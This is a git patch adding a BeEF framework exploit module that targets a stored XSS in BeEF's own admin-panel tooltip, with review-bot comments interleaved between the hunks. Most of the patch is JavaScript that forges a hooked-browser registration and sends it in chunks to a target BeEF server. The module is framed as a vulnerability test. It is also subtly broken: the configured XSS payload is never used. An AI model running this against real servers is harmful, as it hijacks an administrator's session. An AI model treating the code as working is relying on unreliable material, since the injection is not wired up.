From 2080cf5b0d50aaea39e28a701d4485d7f42245c3 Mon Sep 17 00:00:00 2001
From: zinduolis
Date: Wed, 21 Jan 2026 09:38:50 +1000
Subject: [PATCH] add module for admin panel xss
---
.../exploits/beef_admin_panel_xss/command.js | 167 ++++++++++++++++++
.../exploits/beef_admin_panel_xss/config.yaml | 15 ++
.../exploits/beef_admin_panel_xss/module.rb | 17 ++
3 files changed, 199 insertions(+)
create mode 100644 modules/exploits/beef_admin_panel_xss/command.js
create mode 100644 modules/exploits/beef_admin_panel_xss/config.yaml
create mode 100644 modules/exploits/beef_admin_panel_xss/module.rb
diff --git a/modules/exploits/beef_admin_panel_xss/command.js b/modules/exploits/beef_admin_panel_xss/command.js
new file mode 100644
index 000000000..10318f560
--- /dev/null
+++ b/modules/exploits/beef_admin_panel_xss/command.js
@@ -0,0 +1,167 @@
+//
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var target_beef_url = "<%= @target_beef_url %>";
+ var xss_payload = "<%= @xss_payload %>";
+
+ // Generate a random session ID (80 characters, uppercase + digits)
+ function generateHookId() {
+ var chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
+ var result = '';
+ for (var i = 0; i < 80; i++) {
+ result += chars.charAt(Math.floor(Math.random() * chars.length));
+ }
+ return result;
+ }
+
+ // Get current timestamp in milliseconds
+ function ts() {
+ return Date.now();
+ }
+
+ // Split string into chunks
+ function chunkString(str, length) {
+ var chunks = [];
+ for (var i = 0; i < str.length; i += length) {
+ chunks.push(str.substring(i, i + length));
+ }
+ return chunks;
+ }
+
+ // Base64 encode (using browser's btoa)
+ function b64encode(str) {
+ return btoa(str);
+ }
+
+ var HOOK = generateHookId();
+
+ // Build the malicious payload - XSS is injected into host.os.name
+ var malicious_os_name = 'Linux';
+
+ var browser_data = [{
+ "cid": 0,
+ "results": {
+ "browser.window.cookies": "BEEFHOOK=" + HOOK,
+ "browser.name": "FFAA",
+ "browser.version": "146.0",
+ "browser.engine": "Gecko",
+ "browser.name.reported": "Mozilla/5.0 (X11; Linux x86_64; rv:146.0) Gecko/20100101 Firefox/146.0",
+ "browser.platform": "Linux x86_64",
+ "browser.language": "en-US",
+ "browser.plugins": "PDF Viewer-v.undefined",
+ "browser.window.title": "Unknown",
+ "browser.window.origin": "http://exploited-host:8000",
+ "browser.window.hostname": "exploited-host",
+ "browser.window.hostport": "8000",
+ "browser.window.uri": "http://exploited-host:8000/victim.html",
+ "browser.window.referrer": "http://exploited-host:8000/victim.html",
+ "browser.window.size.width": 1678,
+ "browser.window.size.height": 168,
+ "browser.date.datestamp": new 
Date().toString(),
+ "host.os.name": malicious_os_name,
+ "host.os.family": "Linux",
+ "host.os.arch": 64,
+ "host.software.defaultbrowser": "Unknown",
+ "hardware.type": "Unknown",
+ "hardware.memory": "unknown",
+ "hardware.gpu": "unknown",
+ "hardware.gpu.vendor": "unknown",
+ "hardware.cpu.arch": "x86_64",
+ "hardware.cpu.cores": 32,
+ "hardware.battery.chargingstatus": "unknown",
+ "hardware.battery.level": "unknown",
+ "hardware.battery.chargingtime": "unknown",
+ "hardware.battery.dischargingtime": "unknown",
+ "hardware.screen.size.width": 5120,
+ "hardware.screen.size.height": 2160,
+ "hardware.screen.colordepth": 24,
+ "hardware.screen.touchenabled": "No",
+ "browser.capabilities.vbscript": "No",
+ "browser.capabilities.flash": "No",
+ "browser.capabilities.silverlight": "No",
+ "browser.capabilities.phonegap": "No",
+ "browser.capabilities.websocket": "Yes",
+ "browser.capabilities.webrtc": "No",
+ "browser.capabilities.webworker": "Yes",
+ "browser.capabilities.webgl": "No",
+ "browser.capabilities.googlegears": "No",
+ "browser.capabilities.activex": "No",
+ "browser.capabilities.quicktime": "No",
+ "browser.capabilities.realplayer": "No",
+ "browser.capabilities.wmp": "No",
+ "browser.capabilities.vlc": "No",
+ "HookSessionID": HOOK
+ },
+ "status": 0,
+ "handler": "/init"
+ }];
+
+ var encoded_data = b64encode(JSON.stringify(browser_data));
+ var chunks = chunkString(encoded_data, 383);
+
+ beef.debug("[BeEF Admin Panel XSS] Sending malicious hook registration to: " + target_beef_url);
+ beef.debug("[BeEF Admin Panel XSS] Generated Hook ID: " + HOOK);
+ beef.debug("[BeEF Admin Panel XSS] Payload chunks: " + chunks.length);
+
+ var requests_sent = 0;
+ var requests_completed = 0;
+ var total_requests = (2 * chunks.length) + 2; // 2 rounds of chunks + hook.js + final dh
+
+ function checkComplete() {
+ if (requests_completed >= total_requests) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>,
+ "result=Exploit sent successfully. 
Fake browser registered with Hook ID: " + HOOK +
+ ". XSS will trigger when admin hovers over the browser entry in the Hooked Browsers list.",
+ beef.are.status_success());
+ }
+ }
+
+ // Send chunks for session IDs 1 and 2
+ for (var sid = 1; sid <= 2; sid++) {
+ for (var idx = 0; idx < chunks.length; idx++) {
+ (function(s, i, chunk) {
+ var url = target_beef_url + "/dh?bh=" + HOOK + "&sid=" + s + "&pid=" + (i + 1) + "&pc=" + chunks.length + "&d=" + encodeURIComponent(chunk) + "&_=" + ts();
+ var img = new Image();
+ img.onload = img.onerror = function() {
+ requests_completed++;
+ checkComplete();
+ };
+ img.src = url;
+ requests_sent++;
+ })(sid, idx, chunks[idx]);
+ }
+ }
+
+ // Send hook.js request after a short delay
+ setTimeout(function() {
+ var hookUrl = target_beef_url + "/hook.js?BEEFHOOK=" + HOOK + "&_=" + ts();
+ var img2 = new Image();
+ img2.onload = img2.onerror = function() {
+ requests_completed++;
+ checkComplete();
+ };
+ img2.src = hookUrl;
+ requests_sent++;
+
+ // Send final dh request
+ setTimeout(function() {
+ var finalChunk = chunks[chunks.length - 1] || "";
+ var finalUrl = target_beef_url + "/dh?bh=" + HOOK + "&sid=3&pid=1&pc=1&d=" + encodeURIComponent(finalChunk) + "&_=" + ts();
+ var img3 = new Image();
+ img3.onload = img3.onerror = function() {
+ requests_completed++;
+ checkComplete();
+ };
+ img3.src = finalUrl;
+ requests_sent++;
+ }, 100);
+ }, 500);
+
+ beef.debug("[BeEF Admin Panel XSS] Initiated " + requests_sent + " requests");
+
+});
diff --git a/modules/exploits/beef_admin_panel_xss/config.yaml b/modules/exploits/beef_admin_panel_xss/config.yaml
new file mode 100644
index 000000000..ecdd537e8
--- /dev/null
+++ b/modules/exploits/beef_admin_panel_xss/config.yaml
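Review bot: The closing `beef.debug("[BeEF Admin Panel XSS] Initiated " + requests_sent + " requests");` runs synchronously, before either `setTimeout` callback has executed its `requests_sent++`, so the logged count is always two short of `total_requests`; log `total_requests` there instead, or move the line into the inner callback after its `requests_sent++`. `xss_payload` is bound from `<%= @xss_payload %>` but never referenced again (the name sent is the literal `'Linux'` in `malicious_os_name`), so `no-unused-vars` will flag it and the option has no visible effect — drop the binding or add a comment saying why it is kept. `b64encode` forwards to `btoa`, which throws for any character outside the Latin-1 range; the `JSON.stringify(browser_data)` input appears to be ASCII here, but a one-line comment on `b64encode` such as `// btoa() throws on characters above U+00FF; input is expected to be ASCII` would record that assumption. The whole `beef.execute` callback is contained in this hunk.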
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ beef_admin_panel_xss:
+ enable: true
+ category: "Exploits"
+ name: "BeEF Admin Panel XSS"
+ description: "This module exploits a Stored XSS vulnerability in the BeEF Admin Panel's Hooked Browsers tooltip. It registers a fake hooked browser with a malicious OS name containing JavaScript payload. When the BeEF administrator hovers over the fake browser entry, the XSS payload executes.

This can be used to test if a target BeEF instance is running a vulnerable version."
+ authors: ["radsec"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/beef_admin_panel_xss/module.rb b/modules/exploits/beef_admin_panel_xss/module.rb
new file mode 100644
index 000000000..c5753dc76
--- /dev/null
+++ b/modules/exploits/beef_admin_panel_xss/module.rb
@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Beef_admin_panel_xss < BeEF::Core::Command
+ def self.options
+ [
+ { 'name' => 'target_beef_url', 'ui_label' => 'Target BeEF URL', 'value' => 'http://localhost:3000', 'width' => '300px' },
+ { 'name' => 'xss_payload', 'ui_label' => 'XSS Payload (JavaScript)', 'value' => "alert('BeEF XSS - Vulnerable!')", 'width' => '400px' }
+ ]
+ end
+
+ def post_execute
+ save({ 'result' => @datastore['result'] })
+ end
+end
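Review bot: The `description` says the module checks whether a target "is running a vulnerable version" but names neither the affected BeEF release range nor the release that fixed the tooltip issue, so an operator reading the module list cannot tell when it applies or when a result is expected to be negative. Append the range and the fix reference once known, for example `Affects BeEF versions up to <fixed-version-placeholder>; see <advisory-reference-placeholder>.`, and keep the one-line YAML scalar so the quoting stays valid.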